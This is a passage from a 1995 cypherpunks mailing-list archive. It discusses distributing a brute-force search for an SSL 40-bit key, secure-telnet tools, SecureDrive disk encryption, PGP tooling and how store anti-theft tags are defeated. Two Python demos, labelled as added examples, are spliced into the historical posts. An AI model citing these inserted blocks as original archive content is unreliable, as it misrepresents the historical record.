is a RE-RADIATION of that particular wave and the receiver detects that
out-of-phase retransmitted wave and sets off the alarm.

The deactivator simply radiates a stronger wave (tuned to the same 
frequency) that burns a small fuse on the sticker and changes the length
of the antenna and hence its resonant frequency.

I'm not sure how the book strips work but they are similar.  There has
to be a mechanism in there for resetting some sort of small microelectric
circuit that can be reset and change the length of the antenna.

-Richard





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Sun, 27 Aug 95 12:21:34 PDT
To: Christian Wettergren <cwe@Csli.Stanford.EDU>
Subject: Re: SSL trouble
In-Reply-To: <199508271848.LAA18104@Csli.Stanford.EDU>
Message-ID: <"swan.cl.cam.:079000:950827192056"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> And there is the third alternative, hierarchical search, which
> distributes the task of giving out keys. This is admittedly a
> little bit more involved, of course. The SKSP had provisions for
> doing it hierarchically, as far as I understood it, although
> I might be wrong.

Indeed, it does, and we plan to provide a "local CPU farm" server
which can be used when a number of machines are sharing the same ID.

> What I wonder is whether the server congestion really showed that
> the protocol is flawed.

No -- but that the early versions of the code were buggy.

As it is, 6 clients which are still running are managing to keep the
server permanently busy.

I think the protocol itself is OKish ..

> Handing out bigger blocks relieved the  situation.

Not really.

It did however mean that when a chunk was allocated, three times as
much work was done !


> 1. The server knows approximately how many requests per second it 
> can take, and tells the clients this information.

Hmm -- hard to tell -- the *server* can take lots, but if the
*clients* have problems, things go wrong.

A select/poll server is not going to be tried on the next one -- that'll only
be used if that goes slow as well ...

> 2. The client initially does a testrun, and determines how fast it 
> runs.

The latest version of brloop starts with a call of "brutessl -q -t 1"
to decide how big the chunks should be ...

> 3. Each client is handed a block that, given the approximate number
> of currently pending and active blocks out there, together with the
> calculation time of the client, will give an acceptable number of 
> requests/time unit to the server.

I suspect that figures would be too crude ...
The server would have to keep track of clients and how long their
sessions take ....
Should a client which takes 20s for a session be given blocks that take
20 times longer to process than one which manages it in 1s ?

> 4. The server acks (S-ACK) the block-ack to the client.

Sorry -- what does that mean ?

> If the client doesn't get an ack (S-ACK) from the server for its ack (B-ACK),
> it keeps the ack around til the next block is calculated, and sends this 
> ack together with the new acks.

Sorry -- I'm lost ...

> 5. The server can hand out allocated blocks to others, for those
> blocks that have not been acked in three times the estimated
> calculation time. 

I've split allocation from ACKs.
One server just doles out keys, the other just collects the ACKs.
I don't want to add that sort of realtime feedback.

What do you do about WWW clients ?

What if someone grabs a big chunk, farms it out to several machines,
and they ACK bits back ... ?


> 6. If a client is unable to get a key allocation after a number of 
> tries, it can choose a random block and search that. It can then be
> acked to the server. This may result in overlapping blocks, but this
> should not pose such a big problem, since most of the key space is
> searched in an orderly manner anyway.

Again no realtime feedback from ACKs :-(

> It would be very interesting if detailed statistics or the logfile
> of the server could be published somewhere. How many machines were
> involved? etc...

That'll come -- as the WWW page says. Please let me know what stats you'd like.
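
The ACK-collecting side described in this message, as an added example (it is not code from the brute server or brloop, and the class and function names are hypothetical): a ledger that merges ACKs arriving in any order, including partial ACKs from a farmed-out chunk and an overlapping randomly chosen block, and reports what is still unsearched without any feedback to the allocator. The space size and ranges are constructed.

```python
# Added illustration: coverage ledger for an ACK-only collector.
# Segment numbers and the space size below are constructed sample values.


class AckLedger:
    """Tracks which half-open ranges [start, end) of a search space are ACKed."""

    def __init__(self, space_size):
        self.space_size = space_size
        self.ranges = []  # sorted, disjoint, non-adjacent (start, end) pairs

    def covered(self):
        return sum(end - start for start, end in self.ranges)

    def ack(self, start, end):
        """Merge one ACK; return how many units it newly covered."""
        if not 0 <= start < end <= self.space_size:
            raise ValueError("ACK lies outside the search space")
        before = self.covered()
        merged, placed = [], False
        for s, e in self.ranges:
            if e < start:                 # entirely to the left, not touching
                merged.append((s, e))
            elif end < s:                 # entirely to the right, not touching
                if not placed:
                    merged.append((start, end))
                    placed = True
                merged.append((s, e))
            else:                         # overlaps or abuts: absorb it
                start, end = min(s, start), max(e, end)
        if not placed:
            merged.append((start, end))
        self.ranges = merged
        return self.covered() - before

    def gaps(self):
        """Ranges nobody has ACKed yet, in ascending order."""
        out, cursor = [], 0
        for s, e in self.ranges:
            if cursor < s:
                out.append((cursor, s))
            cursor = e
        if cursor < self.space_size:
            out.append((cursor, self.space_size))
        return out


def demo():
    ledger = AckLedger(1000)
    log = []
    # One big chunk (0..300) farmed out to three machines that ACK out of order,
    # a randomly chosen block (250..400) that overlaps it, and a duplicate ACK.
    for start, end in [(0, 100), (200, 300), (250, 400), (100, 200), (50, 150)]:
        log.append(ledger.ack(start, end))
    return log, ledger.ranges, ledger.gaps()


if __name__ == "__main__":
    newly, ranges, gaps = demo()
    print("newly covered per ACK:", newly)
    print("merged ranges:", ranges)
    print("still unsearched:", gaps)
```

An ACK that newly covers zero units is a duplicate or a fully overlapping block, which is the cost of random-block fallback that the ledger makes measurable.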




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 27 Aug 95 18:20:52 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: proliferation of voicesystems
In-Reply-To: <199508272159.RAA00299@clark.net>
Message-ID: <199508280120.VAA20942@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Ray Cromwell writes:
>   The problem is, what will be done for the Unix users? A standard
> audio API is sorely missing in the unix world (NetWork Audio 
> System and AudioFile aren't solutions)

It depends on what you mean by an API. If you are just talking about
driver interfacing there are de facto standards at this point --
basically everyone has been adopting the sun /dev/audio ioctls. 

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Penny <penny@tyrell.net>
Date: Sun, 27 Aug 95 20:33:19 PDT
To: cypherpunks@toad.com
Subject: Re: e$: The Book-Entry/Certificate Distinction
Message-ID: <199508280328.AA18864@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain



> Date: Wed, 23 Aug 1995 23:30:27 -0700
> From: tcmay@got.net (Timothy C. May)
> Subject: Re: e$: The Book-Entry/Certificate Distinction
> 
> At 4:10 AM 8/24/95, Alan Penny wrote:
> >The other night I heard that some of the rules for selling stock have
> >been changed to allow companies to sell stock directly to investors.
> >I have been thinking that this may have the potential to support an
> >interesting system.
> 
> My company sold stock to me directly, through a Stock Participation Plan
> and an Incentive Stock Option Plan.

I think that the point of the news report was that in the past companies
were limited in the type of investor they could sell to (e.g., employee,
stock-broker). I assume what they meant by the report was that a company
under the new rules could sell stock to anyone who asked.

> 
> >Imagine "Portfolio Accounts" with a debit-card like access method.
> 
> I use a debit card which directly accesses my stock account. More on this
> in a moment.
> 
> >Instead of paying for an item at a store with money or credit you use
> >your Portfolio-Account card and buy the item with shares/micro-shares
> >of stock. Stock brokers may offer this type of service in response to the
> >competition of companies bypassing them. Stock brokers could set up
> >services that mediate between transactions calculating trades and values
> >"on-the-fly" (anonymity could be tricky to build into this system).
> 
> This is where it breaks down. Stock prices are denominated in dollars (or
> the local currency, as applicable). And local purchases are denominated in
> dollars. Nobody pays "one microMicrosoft" for a loaf of bread. They pay $1.
> And Microsoft stock sells for $100, not 100 loaves of bread.

Prices could still be denominated in dollars, but the actual transaction
could be executed with stock value (at the current market price). There
would be an element of risk in these transactions since after the
transaction a stock's value might go down, but it might also go up as
well. I would think that if a merchant had a large volume of
transactions and a varied stock "intake" a merchant's portfolio would
tend to balance out in terms of stock increases and decreases.

>
> >If the company you worked for paid you with stock instead of money this
> >would complete the loop.
> 
> The IRS and other tax authorities have this one figured out: barter
> economies are not generally a way to avoid taxes.
>

Oh well, you win some and you lose some :-)

> >This also has the interesting feature of avoiding all taxes. Until you
> >"cash out" your account you would not have to pay taxes, if you never
> >need to cash out your account, you never need to pay taxes. I suspect that
> >our friendly governments would try to "correct" this "problem" in the
> >long run if they can.
> 
> If you are paid in barter for some service, taxes are still owed, based on
> the estimated value of services rendered.
> 
> By the way, a simpler example than all this talk of partial shares of
> companies is simply to talk about paying each other in gold, or oil, or any
> other commodities.

Hmmm, a "micro-spot" commodity market?

Cordially,

[-------------------------------------------------------------------------]
[  Public pgp-key: email penny@tyrell.net with subject as 'send pgp-key'  ]
[       My opinions are mine. I have scored 90% on the Turing Test.       ]
[                   Alan Penny, penny@tyrell.net                          ]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Sun, 27 Aug 95 19:44:17 PDT
To: perry@piermont.com
Subject: Re: proliferation of voicesystems
In-Reply-To: <199508280120.VAA20942@frankenstein.piermont.com>
Message-ID: <199508280244.WAA12743@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> Ray Cromwell writes:
> >   The problem is, what will be done for the Unix users? A standard
> > audio API is sorely missing in the unix world (NetWork Audio 
> > System and AudioFile aren't solutions)
> 
> It depends on what you mean by an API. If you are just talking about
> driver interfacing there are de facto standards at this point --
> basically everyone has been adopting the sun /dev/audio ioctls. 

  That's too low-level to deal with the proliferation of PC sound systems,
especially since even non-intel workstations are adopting PCI buses.
If I recall, /dev/audio relies on u-law/a-law encoding. That's only one
component of a higher level audio system. That's like having a
/dev/svga but no Motif library. Furthermore, a /dev/audio like
interface doesn't admit good hardware acceleration, such as if you
had to play an MPEG layerIII audio, but your sound card had a DSP.

-Ray

  

 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: steven ryan <sryan@reading.com>
Date: Sun, 27 Aug 95 19:50:19 PDT
To: cypherpunks@toad.com
Subject: Re: nym server development mailing list
Message-ID: <199508280250.WAA09233@zork.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain



>John created a mailing list for those interested in contributing to the
>development of his nymserver and as a forum for discussion of nymserver
>related issues.  So far, there have been few folks subscribed, and no
>answer from those that are presently subscribed to the list.  I find
>this rather disappointing.

This sounds very interesting and on topic for the list. If it is such low
volume why not talk about it here and then if it gets to be too much volume
move it to a separate list? You may generate more interest that way and keep
more people informed.

Steven
Steven Ryan
sryan@reading.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Sun, 27 Aug 95 14:53:57 PDT
To: Matt Miszewski <crypto@midex.com>
Subject: Re: Thanks for all your efforts ... you can stop now ...
In-Reply-To: <Pine.3.89.9508272250.A957-0100000@shaq.midex.com>
Message-ID: <"swan.cl.cam.:122740:950827215255"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> Can someone please summarize the experience for those of us who were on 
> vacation during the trial so we can learn in an abridged way?  What 
> problems ensued (the bottlenecks, etc.) and what solutions were thought 
> up?  Thanks.

See http://www.brute.cl.cam.ac.uk/brute/ for a view from the centre ...
Any other experiences welcomed.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: edgar@highnrg.sbay.org (Edgar Swank)
Date: Mon, 28 Aug 95 00:18:29 PDT
To: Cypherpunks          <cypherpunks@toad.com>
Subject: Announcing SecureDrive 2.4
Message-ID: <Lw5iaD5w165w@highnrg.sbay.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

This is to announce the availability of Version 1.4 of SecureDrive.

SecureDrive Version 1.4 replaces version 1.3d and previous versions.

Changes for 1.4 have added significant new function.

New features include ability to use a keyfile either instead of or
in addition to a passphrase, the /ADD function and the option to
specify a drive letter, which is remembered, when specifying manual
partition parameters to LOGIN.

/ADD allows you to LOGIN multiple hard disk partitions (with the
same key) at the same time.

The subroutine which "finds" a physical hard disk partition based on
the DOS drive letter has been improved, so hopefully situations where
manual partition parameters must be used will be rare.

Releases 1.3, 1.3a, 1.3d and 1.4 of Secure Drive are based on releases 1.0
and 1.1, mostly written by

  Mike Ingle <mikeingle@delphi.com>

and version 1.2, with significant new code by myself.

The code which we wrote is not copyrighted, but the program contains GNU
Copylefted code, and therefore may be freely distributed under the terms of
the GNU General Public Licence. See file COPYING for legalese.

SecureDrive provides strong encryption via the IDEA cypher (The same
symmetrical cypher used by PGP) for your files on diskettes or up to
four hard disk partitions. You encrypt your diskettes and/or HD
partitions with CRYPTDSK. Then you can access the data by using
LOGIN and SECTSR. This provides "on-the-fly" decryption (and
re-encryption) as disk sectors are accessed by your applications.

Entering LOGIN /C or powering off your PC clears the crypto keys from
memory and your encrypted disks are "instantly" secure.

Mike Ingle and I have different opinions on the distribution of
SecureDrive.  Under the GNU General License (copyleft) I do not need
Mike's permission to distribute version 1.4 and I have not asked for
same.  My policy on distribution is in the version 1.4 doc:

    Exporting this program.  Cryptography is export controlled, and
    sending this program outside the country may be illegal.  Don't do
    it.

    The "author" of versions 1.2 and 1.3, Edgar Swank, says that the
    export ban should not prevent you from placing this program on
    public BBS's and anonymous FTP sites in the US and Canada.  If
    individuals outside the US/Canada use the internet or
    international long distance to obtain copies of the program, THEY
    may be breaking US law.

    Any such foreign individuals should be aware that US law
    enforcement may legally (under US law) apprehend individuals who
    break US laws even if such individuals are not on or even have
    never been on US soil.  Such apprehension may remove such
    individuals directly to US jurisdiction without benefit of
    extradition proceedings in such individuals' home country(ies).

SecureDrive Version 1.4 is already available for download on the
following public BBS's as SECDR14.ZIP:

  Flying Dutchman      (408)294-3065

Colorado Catacombs BBS, 303-772-1773 (up to 28,800 bps, log in with your
own name, answer the questions, and download SECDR14.ZIP).

ftp://ftp.csn.net/mpj/I_will_not_export/crypto_???????/disk/secdr14.zip
see ftp://ftp.csn.net/mpj/README for the ???????

ftp://miyako.dorm.duke.edu/mpj/crypto/disk/secdr14.zip
See ftp://miyako.dorm.duke.edu/pub/GETTING_ACCESS for access instructions.

Here are the contents of SECDR14.ZIP

 Length  Method   Size  Ratio   Date    Time    CRC-32  Attr  Name
 ------  ------   ----- -----   ----    ----   -------- ----  ----
  18321  DeflatX   6914  63%  06-14-93  22:27  0767480b --w-  COPYING
   2022  DeflatX    789  61%  08-06-95  00:00  dd3e9e64 --w-  COPYSECT.C
  12542  DeflatX   7670  39%  08-06-95  00:00  c089888f --w-  COPYSECT.EXE
    152  Stored     152   0%  08-06-95  00:00  17b02bc2 --w-  COPYSECT.SIG
  19664  DeflatX   4183  79%  11-19-93  21:42  22c2502c --w-  CRYPT2.ASM
  19622  DeflatX   4594  77%  08-06-95  00:00  14940d0b --w-  CRYPTDSK.C
  41834  DeflatX  19854  53%  08-06-95  00:00  2e5664b8 --w-  CRYPTDSK.EXE
    152  Stored     152   0%  08-06-95  00:00  484719f3 --w-  CRYPTDSK.SIG
   4353  DeflatX   1724  61%  08-06-95  00:00  b4e99e6a --w-  FPART.C
  15450  DeflatX   9790  37%  08-06-95  00:00  44c4a0e7 --w-  FPART.EXE
    152  Stored     152   0%  08-06-95  00:00  0b345a16 --w-  FPART.SIG
   2998  DeflatX   2113  30%  04-22-95  13:23  1a54cbe5 --w-  KEY.ASC
  18447  DeflatX   4526  76%  08-06-95  00:00  d9f91a8e --w-  LOGIN.C
  43476  DeflatX  20274  54%  08-06-95  00:00  39b32d3d --w-  LOGIN.EXE
    152  Stored     152   0%  08-06-95  00:00  cb182e12 --w-  LOGIN.SIG
   1554  DeflatX    568  64%  08-06-95  00:00  3589f489 --w-  MAKEFILE
  11557  DeflatX   3277  72%  05-09-93  19:38  e71f3eea --w-  MD5.C
   3407  DeflatX   1097  68%  05-11-93  12:49  f1f58517 --w-  MD5.H
   1355  DeflatX    629  54%  01-21-94  08:44  db63ade4 --w-  RLDBIOS.ASM
  14757  DeflatX   4050  73%  08-06-95  00:00  2142bf7c --w-  SDCOMMON.C
  52175  DeflatX  18701  65%  08-06-95  00:00  da0e2c45 --w-  SECDRV.DOC
   3656  DeflatX   1094  71%  08-06-95  00:00  6ed75bcc --w-  SECDRV.H
  32595  DeflatX   8860  73%  08-06-95  00:00  1c7d2225 --w-  SECTSR.ASM
   2000  DeflatX   1326  34%  08-06-95  00:00  ba1568d1 --w-  SECTSR.COM
    152  Stored     152   0%  08-06-95  00:00  3817512c --w-  SECTSR.SIG
  11519  DeflatX   2801  76%  08-06-95  00:00  060d33e8 --w-  SETENV.ASM
   1254  DeflatX    541  57%  05-09-93  19:39  182978aa --w-  USUALS.H
    276  DeflatX    248  11%  08-06-95  00:00  20880832 --w-  FILE_ID.DIZ
 ------          ------  ---                                  -------
 335594          126383  63%                                       28

Also note that the ZIP file contains PGP detached signatures (*.SIG)
for the executable files.  Finally here is my public key, also
available on many public keyservers; note who has signed it.

(HighNRG is only address currently valid)
Type bits/keyID    Date        User ID
pub  1024/DA87C0C7 1992/10/17  Edgar W. Swank   <edgar@HighNRG.sbay.org>
                               Edgar Swank   <edgar@Garg.Campbell.CA.US>
                               Edgar W. Swank <edgar@spectrx.sbay.org>
                               Edgar W. Swank <edgar@spectrx.saigon.com>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMD9Snt4nNf3ah8DHAQFVOAP5AQPD3TESTabv35I7yBtmMFYS5VDoQB5M
7Lxz3YbDDLr15vCzKcCe58KbCit+XqL11YjQcWXFjlYY83ouIxwIWRb0AEOQq2NC
MRxIC61DGLcb2ry0UCKhD5Szj9QCJE/sF3Zx9EiuKDYu0Xbx8zKv4zTpdyO1CMQS
sw/NA3PbzX8=
=jv0o
-----END PGP SIGNATURE-----

---
edgar@HighNRG.sbay.org
Keep Freestyle Alive!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@wero>
Date: Sun, 27 Aug 95 22:13:48 PDT
To: cypherpunks@toad.com
Subject: Encrypted TCP, telnet, etc
Message-ID: <199508280514.XAA00277@wero>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Just noticed this on USENET. Sorry if it's passed through cpunks lately,
but ya know, sometimes I just fall asleep while the conspiracypunks drivel
goes by, and don't notice when someone strays back to crypto.

- ---Start Msg
Newsgroups: alt.security,sci.crypt
Subject: Secure Telnet: Summary
Message-ID: <41q81d$22he@info4.rus.uni-stuttgart.de>
From: zcbi1122@rpool4.rus.uni-stuttgart.de (Jochen Schwarze)
Date: 27 Aug 1995 16:55:09 GMT
Organization: Comp.Center (RUS), U of Stuttgart, FRG
NNTP-Posting-Host: rpool4.rus.uni-stuttgart.de
Lines: 74

Thanks to everyone who responded to my posting regarding a `secure
telnet' implementation:

    Is there a (possibly free) implementation of something like a
    "secure telnet"?  I'm looking for a way to login into a remote
    system providing secure interactive communication between the two
    hosts over (possibly insecure) Internet connections.

Here's a summary of the implementations I am now aware of:

* SSL 

There is a free implementation of Netscape's SSL Protocol (Secure
Socket Layer) by Eric Young named "SSLeay"
<ftp://ftp.psy.uq.oz.au/pub/Crypto/SSL/>.  Eric Young is also the
author of a popular DES Library.
<ftp://ftp.psy.uq.oz.au/pub/Crypto/DES/>

SSL provides a secure authentication and encryption basis on top of
which application protocols like telnet, ftp, and http may be
transparently added <http://home.netscape.com/info/SSL.html>.
However, the RC4 encryption using a 40 bit key, which is employed by
SSL, has recently been cracked with a brute force attack, see
RISKS-17.27 <http://catless.ncl.ac.uk/Risks/17.27.html#subj1>.

A modified version of telnet that uses SSL-based authentication and
encryption is also available
<ftp://ftp.psy.uq.oz.au/pub/Crypto/SSLapps/>.


* Deslogin

Deslogin by Dave Barrett <barrett@asgard.cs.colorado.edu> provides a
network login service much like rlogin/rlogind.  Deslogin uses a
`challenge-response' protocol to authenticate users.  Also, all data
transmitted to and from the remote host is encrypted using the DES.
Deslogin also includes a command-line program `cipher' for fast DES
encryption. <ftp://ftp.uu.net/pub/security/des/>


* SRA Telnet 

This is a version of the SRA Telnet modified by the Technical
University of Chemnitz.  A session key is negotiated using an
uncertified Diffie-Hellman-Method and used for the encryption of UID
and password.  The complete session text is encrypted with DES in CFB
mode. <ftp://ftp.tu-chemnitz.de/pub/Local/informatik/sec_tel_ftp>


* Ssh

Ssh (Secure Shell) is a program to log into another computer over a
network, to execute commands in a remote machine, and to move files
from one machine to another.  It provides strong authentication and
secure communications over insecure channels.  Among other features,
Ssh is a complete replacement for rlogin, rsh, and
rcp. <ftp://ftp.funet.fi/pub/unix/security/ssh-1.0.0.tar.gz>


* Skey

Bell Canada's `skey' free-ware implements a one-time password system,
so that sniffers can get your ID and PW, but can't use the PW next
time. <ftp://ftp.cert.dfn.de/pub/tools/password/SKey/>


- ----------------------------------------------------------------------
I provide this information in the hope that it will be useful, but
with no claim of either completeness or correctness.  Thanks again to
all who contributed to compile the above information.

- -- 
    Jochen Schwarze
    <jochen.schwarze@studbox.uni-stuttgart.de>

- ---End Msg

First question: what does anyone know about these programs.
Second question: since I'm only a cyphergroupie, how can I make use
  of these programs?

Currently, I'm trying to move as many operations as I can (mix client,
mail reading, etc) to my local Linux box so that all traffic headed through
my server is already encrypted. Naturally, some of these programs
look interesting, the SSL telnet (but what about the other end?) for
example.

I noticed an announcement that DID come across cpunks:


[snip]
Announcing CryptoTCP beta version 0.9

CTCP is a public domain software package to do encrypted TCP sessions on
unix systems.  It features Diffie-Hellman key exchange with triple-DES
encryption.  This initial release is to be considered a beta version.
Bug reports or comments on security issues are invited.
[snip]

Detached signature for ctcp.0.9.tar:

- - -----BEGIN PGP MESSAGE-----
Version: 2.71828

iQCVAgUAMBqiPf32LDYerV6NAQHUoAP/RLU0mM3ydxC9vjzay8hR5Qmb5zupHyCO
klW8IYjxIt14jnBTqkVM7q+mnaAWK2Ishppe14H5K6MAn/VOe2o5Hf61wAzJuxzw
wywiA9ZOdb+2cxm86YMgdbrnv430BCbSjPITV5PHyorovSqhX4RLLB1R8oOX4WUB
5WwzgLyV6Kc=
=ltvK
- - -----END PGP MESSAGE-----


But I missed where this comes from, and I doubt I'd be able to
drop it into my Linux in anything resembling a plug-and-play
style. Anybody tried this?

Don

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMEFQdMLa+QKZS485AQENNwMAu5du39fa8Dy5qaFCV0sq2IK4kwUVGYsP
1RndpErFYQoWC6wTmz2wB4AqeDUG6OmujFPF6as9vvl6RPT3MxKcd2St7wAGllwX
p7Q0WTfPA7u2ICStsvJ/MtRMKSMQniii
=fYr3
-----END PGP SIGNATURE-----
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://bert.cs.byu.edu/~don     or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Death threats ALWAYS pgp signed
* This user insured by the Smith, Wesson, & Zimmermann insurance company *
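
How the one-time password scheme in the Skey entry of the summary above keeps a sniffed password from being reused, as an added example (not code from the skey distribution or from either poster): a hash chain where the server stores only the last accepted value. SHA-256 stands in for the hash the real tool uses, and the function names, class name, secret and seed are hypothetical.

```python
import hashlib
import hmac

# Added illustration. SHA-256 is a stand-in hash; the secret, seed and counts
# are constructed sample values.


def otp(secret: bytes, seed: bytes, n: int) -> bytes:
    """n-th value of the chain: H applied n+1 times to seed||secret."""
    value = hashlib.sha256(seed + secret).digest()
    for _ in range(n):
        value = hashlib.sha256(value).digest()
    return value


class OtpServer:
    """Holds only the last accepted chain value, never the secret."""

    def __init__(self, seed: bytes, count: int, top: bytes):
        self.seed, self.count, self.last = seed, count, top

    def challenge(self):
        """Seed and the chain index the client must answer with."""
        return self.seed, self.count - 1

    def verify(self, response: bytes) -> bool:
        if self.count <= 0:
            return False  # chain used up: the user must re-initialise
        if not hmac.compare_digest(hashlib.sha256(response).digest(), self.last):
            return False  # wrong value or a replay; state is left untouched
        self.last = response      # next login must present the preimage of this
        self.count -= 1
        return True


def demo():
    secret, seed = b"constructed pass phrase", b"wero0001"
    server = OtpServer(seed, 3, otp(secret, seed, 3))
    out = {}
    _, n = server.challenge()
    sniffed = otp(secret, seed, n)          # what crosses the wire
    out["login_1"] = server.verify(sniffed)
    out["replay"] = server.verify(sniffed)  # sniffer resends the same value
    # Hashing the sniffed value only walks back up the chain, to a spent value.
    out["hashed_forward"] = server.verify(hashlib.sha256(sniffed).digest())
    for i in (2, 3):
        _, n = server.challenge()
        out[f"login_{i}"] = server.verify(otp(secret, seed, n))
    out["after_exhaustion"] = server.verify(otp(secret, seed, 0))
    out["remaining"] = server.count
    return out


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:17} {value}")
```

Only the login is protected this way; the session that follows is still sent in the clear unless one of the encrypting tools in the summary carries it.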




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jaeson.M.Engle@dronf.org (Jaeson Engle)
Date: Sun, 27 Aug 95 23:08:47 PDT
To: Bryce Wilcox <seawolf@challenger.atc.fhda.edu>
Subject: Re: PGP for pine and other Unix programs
Message-ID: <v02120c03ac670eaec080@[152.97.60.101]>
MIME-Version: 1.0
Content-Type: text/plain


I'd like to be added to your list of people wanting the 1.0 version. By
then I should have MachTen running on my PowerPC Mac, and I would like
to make sure that it works for that.

Thanks

Jaeson


At 2:19 AM 8/23/95, Bryce Wilcox wrote:

>-----BEGIN PGP SIGNED MESSAGE-----
>
>> Does anyone know of an addon to the Pine mailer that supports PGP?
>> the only PGP software i could find required me to first compose a
>> letter in an editor then run it through a pgp signature program
>> then finally read it into my favorite mailer.
>>
>> I'm looking for something that is hopefully transparent, or if not
>> relatively quick to do.
>
>
>My "Bryce's Auto-PGP" fits the bill.  It is an sh script so it can be
>integrated without too much trouble into Pine, Elm, trn, tin, mh, etc etc.
>I have personally tested it with Pine so I know it'll work.  You can e-mail
>me for a beta copy, or you can ask for a v1.0 copy if you don't mind waiting
>an unspecified amount of time for beta-testing to finish.
>
>
>Regards,
>
>Bryce
>
>-----BEGIN PGP SIGNATURE-----
>Version: 2.6.2
>Comment: Auto-signed with Bryce's Auto-PGP v1.0beta
>
>iQCVAwUBMDrWWfWZSllhfG25AQEpXQP+ISF5DNtNa/SbceUTPzFkHLO7YFoV01+S
>t91Tt488GplyFQrimqbJpRTRtdxNjt4fR7o23F9kbRkPRtD3zQPxi0/jjT29JrNU
>Oi0eiteq2FpgAoevMdkfwdsVKupW2fb78jNnz2490JHM/Zr1CvOH+2bwziQ1i8hR
>5y48rjUrLTE=
>=DQYq
>-----END PGP SIGNATURE-----


--
Jaeson M. Engle                     http://www.dronf.org
            Coordinator of the Jourvian Group
PGP Mail Encouraged ->   jme.pub.key@dronf.org
Project List                     ->        programs@dronf.org






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lwp@mail.msen.com (Lou Poppler)
Date: Mon, 28 Aug 95 08:27:08 PDT
To: cypherpunks@toad.com
Subject: Turing test novel: "Galatea 2.2"
Message-ID: <oJVQwMz2Bo3D083yn@mail.msen.com>
MIME-Version: 1.0
Content-Type: text/plain


Reviewed in The New Yorker (August 21&28 issue) is the novel 
"Galatea 2.2" by Richard Powers, wherein a neural net is nurtured
by an English Literature professor "to counterfeit human responses
to the Master's Comprehensive Exam, which calls for the interpretation
of set texts".  The review makes me want to read this book.

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::   Lou Poppler  <lwp@mail.msen.com>   |    Doom an evil deed,           ::
::     http://www.msen.com/~lwp/        |     liven a mood.               ::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alt@iquest.net (Al Thompson)
Date: Sun, 27 Aug 95 23:46:25 PDT
To: cypherpunks@toad.com
Subject: Re: Demagnetizing
Message-ID: <m0smxsc-00061tC@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text/plain


At 04:26 PM 8/27/95 -0500, Buford Terrell wrote:
>
>>Reply-To: dr261@cleveland.Freenet.Edu (Tobin T Fricke)
>
>>
>>Where exactly is the r/c circuit?  Is it very small and in
>>a label?  Book publishers don't put them in, do they?  
>>Also, if the thing gets "burned out" by the magnet in the
>>pad, what do libraries and such do where materials are
>>reused?  Just slap on another label thing?  
>>
>It's much more low-tech than that.  Libraries and book stores just
>put a strip of magnetized material (it's much like audio tape,
>about 1/8 inch wide and comes on rolls) inside the book and then
>put detectors at the doorway.  If the detector feels a magnetic field,
>it buzzes; if the tape has been degaussed, nothing happens.
>
>For libraries, it's usually mounted on sticky tape and put down
>inside the book spine.  Bookstores usually just snip off a 4 - 5"
>segment and slip it inside the book.  Music stores frequently tape
>a small section on the outside of CD jewel boxes.
>
>Sorry, there's no real mystery or exciting tech here.
 
There's still some mystery.
 
For instance, how does it differentiate between the magnetic
field of their strip, and the magnetic field of the strip on your
credit card, or the speaker on your cell phone?
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@wero>
Date: Mon, 28 Aug 95 00:56:05 PDT
To: cypherpunks@toad.com
Subject: DNS key distribution/keyservers
Message-ID: <199508280757.BAA00876@wero>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

A while ago, Peter Trei <trei@toad.com> said:

>Don Eastlake has actually done a draft RFC on
>using the DNS for key distribution.
>
>It may be found at 
>
>ftp://ietf.cnri.reston.va.us/internet-drafts/draft-ietf-dnssec-secext-04.txt
[snip]

I'm sure everyone agrees that a 5 meg keyfile is a bit big, but has anyone
considered working on the QUALITY of the keyfile instead of making it easier
to retrieve QUANTITIES of keys.. Ie: What about creating one big web of
trust out of current keys. Or maybe allowing keys only if they have some
connection to some other key previously submitted, or simultaneously 
submitted.

Currently, having one big keyfile creates the impression that keys
distributed over a keyserver are more valid. In a sense they are, but only
because someone who's being spoofed could learn of the key that is
supposedly theirs.

However, there's really no reason to trust a key as anything but a nym
unless it's signed by someone in _your_ web of trust. I believe that
modifying keyservers to accept only keys that are linked to currently
known keys would encourage everyone to become part of that web of trust.
After all, the public key of a nym can be obtained from the nym themself.

Anybody have any thoughts on this?

Don

